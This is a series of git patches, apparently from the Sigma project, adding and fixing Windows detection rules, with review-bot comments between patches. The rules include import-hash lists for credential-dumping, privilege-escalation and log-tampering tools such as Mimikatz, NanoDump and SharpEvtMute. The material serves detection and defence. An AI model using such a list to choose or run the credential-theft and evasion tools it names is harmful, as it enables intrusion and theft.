IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz - - 
IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader - - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump - - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi - - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi - - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi - - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi - - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi - - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi - - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi - - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi - - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi - - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi - - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi - - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE - - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE - - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers - - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert - - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert - - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert - condition: selection + selection: + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 0c106686a31bfe2ba931ae1cf6e9dbc6 # Mimikatz + - 0d1447d4b3259b3c2a1d4cfb7ece13c3 # Mimikatz + - 1b0369a1e06271833f78ffa70ffb4eaf # Mimikatz + - 4c1b52a19748428e51b14c278d0f58e3 # Mimikatz + - 4d927a711f77d62cebd4f322cb57ec6f # Mimikatz + - 66ee036df5fc1004d9ed5e9a94a1086a # Mimikatz + - 672b13f4a0b6f27d29065123fe882dfc # Mimikatz + - 6bbd59cea665c4afcc2814c1327ec91f # Mimikatz + - 725bb81dc24214f6ecacc0cfb36ad30d # Mimikatz + - 9528a0e91e28fbb88ad433feabca2456 # 
Mimikatz + - 9da6d5d77be11712527dcab86df449a3 # Mimikatz + - a6e01bc1ab89f8d91d9eab72032aae88 # Mimikatz + - b24c5eddaea4fe50c6a96a2a133521e4 # Mimikatz + - d21bbc50dcc169d7b4d0f01962793154 # Mimikatz + - fcc251cceae90d22c392215cc9a2d5d6 # Mimikatz + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - 
e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 # Mimikatz + - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 # Mimikatz + - 
IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF # Mimikatz + - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 # Mimikatz + - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F # Mimikatz + - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A # Mimikatz + - IMPHASH=672B13F4A0B6F27D29065123FE882DFC # Mimikatz + - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F # Mimikatz + - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D # Mimikatz + - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 # Mimikatz + - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 # Mimikatz + - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 # Mimikatz + - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 # Mimikatz + - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 # Mimikatz + - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 # Mimikatz + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - 
IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - 
IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + condition: selection falsepositives: - - Legitimate use of one of these tools -level: high \ No newline at end of file + - Legitimate use of one of these tools +level: high From a69d256367f8ef0f72341932d738f7ed7a77928b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 7 Sep 2022 16:33:52 +0200 Subject: [PATCH 33/73] rule: SharpEvtMute --- ...eation_win_sysmon_disable_sharpevtmute.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml diff --git a/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml b/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml new file mode 100644 index 000000000..878656d6a --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml 
@@ -0,0 +1,25 @@ +title: SharpEvtMute EvtMuteHook Load +id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c +status: experimental +description: Detects the use of SharpEvtHook, a tool to tamper with Windows event logs +references: + - https://github.com/bats3c/EvtMute +author: Florian Roth +date: 2022/09/07 +tags: + - attack.defense_evasion + - attack.t1562.002 +logsource: + product: windows + category: process_creation +detection: + selection: + - Image|endswith: '\SharpEvtMute.exe' + - Description: 'SharpEvtMute' + - CommandLine|contains: + - '--Filter "rule ' + - '--Encoded --Filter \"' + condition: selection +falsepositives: + - Unknown +level: high From 1641f4590a27cae4e236ddfb94bdd2efc78424d6 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 7 Sep 2022 17:12:12 +0200 Subject: [PATCH 34/73] fix: duplicate UUIDs --- .../image_load/image_load_sysmon_disable_sharpevtmute.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml index 8c3617ae1..e9f0a45d6 100644 --- a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml +++ b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml @@ -1,5 +1,5 @@ title: SharpEvtMute EvtMuteHook Load -id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c +id: 49329257-089d-46e6-af37-4afce4290685 status: experimental description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs references: From b70ac176760e3ac9768ecae1bcd17f994e3a86f0 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 7 Sep 2022 21:58:22 +0200 Subject: [PATCH 35/73] Fix --- .../create_stream_hash_susp_ip_domains.yml | 20 +++++++++---------- .../proc_creation_win_system_exe_anomaly.yml | 2 +- 2 files changed, 11 insertions(+), 11 deletions(-) 
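Review bot: The title `SharpEvtMute EvtMuteHook Load` describes a DLL load, not the process_creation event this rule matches, and the description names the tool `SharpEvtHook` while every selection value says `SharpEvtMute`; `title: SharpEvtMute Execution` and `description: Detects execution of SharpEvtMute, a tool to tamper with Windows event logging` would make the rule self-consistent. The `id` is the same UUID as the image_load rule (the following commit changes the other file's id, so the pair should be checked once both are merged). The value `'--Encoded --Filter \"'` only matches if the Sigma parser treats a backslash before a quote as a literal backslash; if a plain quote is meant, `'--Encoded --Filter "'` is the unambiguous form and deserves a comment either way.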
diff --git a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml index fb83898d4..8e5e50eae 100644 --- a/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml +++ b/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the download of suspicious file type from URLs with IP author: Nasreddine Bencherchali references: - - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 + - https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md date: 2022/09/07 logsource: product: windows @@ -12,15 +12,15 @@ logsource: detection: selection_domain: Contents|contains: - - '1.' - - '2.' - - '3.' - - '4.' - - '5.' - - '6.' - - '7.' - - '8.' - - '9.' + - '://1' + - '://2' + - '://3' + - '://4' + - '://5' + - '://6' + - '://7' + - '://8' + - '://9' selection_extension: TargetFilename|contains: - '.ps1:Zone' diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index fbc66ccbf..e9ec591cf 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/GelosSnake/status/934900723426439170 author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 -modified: 2022/07/14 +modified: 2022/09/07 tags: - attack.defense_evasion - attack.t1036 From baf603bb5c3cdd95b1f759ccd3c3e717854d534c Mon Sep 17 00:00:00 2001 
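Review bot: The replacement values `'://1'` through `'://9'` in `selection_domain` still only test that the host part starts with a digit, so any URL with a numeric-leading hostname (a constructed example: `https://1files.example/`) is treated as an IP-literal download. Where the target backend supports the `re` modifier (this repository already uses `TargetFilename|re` in another rule), `Contents|re: '://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'` pins the intent to dotted-quad hosts and replaces the nine-entry list. Whichever form is kept, a comment on `selection_domain` (`# leading digit after :// used as IP-literal heuristic`) would tell the next maintainer why the list looks the way it does.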
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 8 Sep 2022 10:24:27 +0200 Subject: [PATCH 36/73] Fix FP in testing --- .../registry_set/registry_set_disable_winevt_logging.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index a0d67a125..04c010857 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/08/26 +modified: 2022/09/08 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 @@ -27,6 +27,10 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' + filter_empty: + Image: + - '' + - null condition: selection and not 1 of filter* falsepositives: - Legitimate administrators disabling specific event log for troubleshooting From 15713918cd538fcdc2a713b73ae39b83e7694cdf Mon Sep 17 00:00:00 2001 
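Review bot: `filter_empty` excludes every event whose `Image` is `''` or null, which removes the testing false positive but also silently drops any change to the `Enabled` value that the sensor records without image attribution, and nothing in the rule documents that gap. A comment on the filter recording what produced the empty-Image events (`filter_empty: # empty/null Image seen as FP during testing; revisit`) would let a later reviewer judge whether the exclusion is still justified. PATCH 38 adds the same pattern to `dns_query_win_susp_ldap.yml` as `filter_unknown: Image: ''` without the null case; since backends render `''` and null differently, the two rules should agree on how an absent Image is represented.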
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 8 Sep 2022 10:26:23 +0200 Subject: [PATCH 37/73] Rename --- ...> file_event_win_bloodhound_collection.yml} | 18 +++++++++--------- ...nt_win_legitimate_app_dropping_archive.yml} | 4 ++-- ..._event_win_legitimate_app_dropping_exe.yml} | 4 ++-- ...ent_win_legitimate_app_dropping_script.yml} | 4 ++-- 4 files changed, 15 insertions(+), 15 deletions(-) rename rules/windows/file_event/{file_event_bloodhound_collection.yml => file_event_win_bloodhound_collection.yml} (80%) rename rules/windows/file_event/{file_event_legitimate_app_dropping_archive.yml => file_event_win_legitimate_app_dropping_archive.yml} (97%) rename rules/windows/file_event/{file_event_legitimate_app_dropping_exe.yml => file_event_win_legitimate_app_dropping_exe.yml} (97%) rename rules/windows/file_event/{file_event_legitimate_app_dropping_script.yml => file_event_win_legitimate_app_dropping_script.yml} (97%) diff --git a/rules/windows/file_event/file_event_bloodhound_collection.yml b/rules/windows/file_event/file_event_win_bloodhound_collection.yml similarity index 80% rename from rules/windows/file_event/file_event_bloodhound_collection.yml rename to rules/windows/file_event/file_event_win_bloodhound_collection.yml index 9c0684d33..3bcde4c93 100644 --- a/rules/windows/file_event/file_event_bloodhound_collection.yml +++ b/rules/windows/file_event/file_event_win_bloodhound_collection.yml 
@@ -8,20 +8,20 @@ references: date: 2022/08/09 modified: 2022/08/09 tags: - - attack.discovery - - attack.t1087.001 - - attack.t1087.002 - - attack.t1482 - - attack.t1069.001 - - attack.t1069.002 - - attack.execution - - attack.t1059.001 + - attack.discovery + - attack.t1087.001 + - attack.t1087.002 + - attack.t1482 + - attack.t1069.001 + - attack.t1069.002 + - attack.execution + - attack.t1059.001 logsource: product: windows category: file_event detection: selection1: - TargetFilename|endswith: + TargetFilename|endswith: - '_BloodHound.zip' - '_computers.json' - '_containers.json' diff --git a/rules/windows/file_event/file_event_legitimate_app_dropping_archive.yml b/rules/windows/file_event/file_event_win_legitimate_app_dropping_archive.yml similarity index 97% rename from rules/windows/file_event/file_event_legitimate_app_dropping_archive.yml rename to rules/windows/file_event/file_event_win_legitimate_app_dropping_archive.yml index a50faf8b5..c03a1d896 100644 --- a/rules/windows/file_event/file_event_legitimate_app_dropping_archive.yml +++ b/rules/windows/file_event/file_event_win_legitimate_app_dropping_archive.yml @@ -48,5 +48,5 @@ falsepositives: - Unknown level: high tags: - - attack.defense_evasion - - attack.t1218 + - attack.defense_evasion + - attack.t1218 diff --git a/rules/windows/file_event/file_event_legitimate_app_dropping_exe.yml b/rules/windows/file_event/file_event_win_legitimate_app_dropping_exe.yml similarity index 97% rename from rules/windows/file_event/file_event_legitimate_app_dropping_exe.yml rename to rules/windows/file_event/file_event_win_legitimate_app_dropping_exe.yml index f9abb5613..fb41d165a 100644 --- a/rules/windows/file_event/file_event_legitimate_app_dropping_exe.yml +++ b/rules/windows/file_event/file_event_win_legitimate_app_dropping_exe.yml @@ -46,5 +46,5 @@ falsepositives: - Unknown level: high tags: - - attack.defense_evasion - - attack.t1218 + - attack.defense_evasion + - attack.t1218 
diff --git a/rules/windows/file_event/file_event_legitimate_app_dropping_script.yml b/rules/windows/file_event/file_event_win_legitimate_app_dropping_script.yml similarity index 97% rename from rules/windows/file_event/file_event_legitimate_app_dropping_script.yml rename to rules/windows/file_event/file_event_win_legitimate_app_dropping_script.yml index 654cbae90..297ecd472 100644 --- a/rules/windows/file_event/file_event_legitimate_app_dropping_script.yml +++ b/rules/windows/file_event/file_event_win_legitimate_app_dropping_script.yml @@ -48,5 +48,5 @@ falsepositives: - Unknown level: high tags: - - attack.defense_evasion - - attack.t1218 + - attack.defense_evasion + - attack.t1218 From 586b1c449f2315c7015922e4df29b47145e68356 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Thu, 8 Sep 2022 16:27:56 +0200 Subject: [PATCH 38/73] fix: FP on race condition --- rules/windows/dns_query/dns_query_win_susp_ldap.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index 85396c220..accfaf6e3 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -3,6 +3,7 @@ id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e description: Detect suspicious ldap request from non Windows application status: experimental date: 2022/08/20 +modified: 2022/09/08 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -17,6 +18,8 @@ detection: filter_defender: Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' Image|endswith: '\MsMpEng.exe' + filter_unknown: + Image: '' condition: dns_request and not 1 of filter_* falsepositives: - Programs that also lookup the observed domain From 1fbd2bba4dcddfa0223a1d34dea893be6d3f9913 Mon Sep 17 00:00:00 2001 
From: Thomas Patzke Date: Thu, 8 Sep 2022 17:57:36 +0200 Subject: [PATCH 39/73] Wrapped all-modifier result into NodeSubexpression Fixes sigmac splunk backend: Wrong conversion for |contains|all #3443 --- tools/sigma/parser/modifiers/transform.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py index 8a5267999..b66eaf9c9 100644 --- a/tools/sigma/parser/modifiers/transform.py +++ b/tools/sigma/parser/modifiers/transform.py @@ -72,7 +72,7 @@ class SigmaAllValuesModifier(SigmaTransformModifier): cond = ConditionAND() for val in self.value: cond.add(val) - return cond + return NodeSubexpression(cond) class SigmaBase64Modifier(ListOrStringModifierMixin, SigmaTransformModifier): """Encode strings with Base64""" From 57243e91e74d98801ca4b39c43c900236df350cb Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Thu, 8 Sep 2022 21:24:23 +0200 Subject: [PATCH 40/73] Sigmatools release 0.22 --- CHANGELOG.md | 20 ++++++++++++++++++++ tools/setup.py | 2 +- 2 files changed, 21 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 688155af7..f5c1ee9e5 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,26 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html) from version 0.14.0. +## 0.22 - 2022-09-08 + +### Added + +* 'windash' modifier +* DNIF backend +* Hedera backend +* StreamAlert backend +* SQLite backend can handle null values. +* Support for different Windows log sources. + +### Changed + +* Various config improvements. + +### Fixed + +* Wrapping expressions from expanding modifiers into ORed subexpressions. +* Various mapping fixes. + ## 0.21 - 2022-04-08 ### Added diff --git a/tools/setup.py b/tools/setup.py index dd05b70e6..efeceb551 100644 --- a/tools/setup.py +++ b/tools/setup.py 
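Review bot: `NodeSubexpression` is introduced on the new line, but the diffstat shows one insertion and one deletion in `transform.py` and no import change, so unless the name is already imported elsewhere in the file (not visible in this hunk) `SigmaAllValuesModifier.apply` raises `NameError` at conversion time; please confirm the import. The method's return type changes from `ConditionAND` to `NodeSubexpression`, which any backend that dispatches on node type now has to accept, and that new contract is undocumented — a docstring such as `"""Return the AND-linked values wrapped in a NodeSubexpression so backends emit the group parenthesised."""` would record it. `apply` begins outside the hunk; a regression test with a `|contains|all` selection against the splunk backend would pin the fix for #3443.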
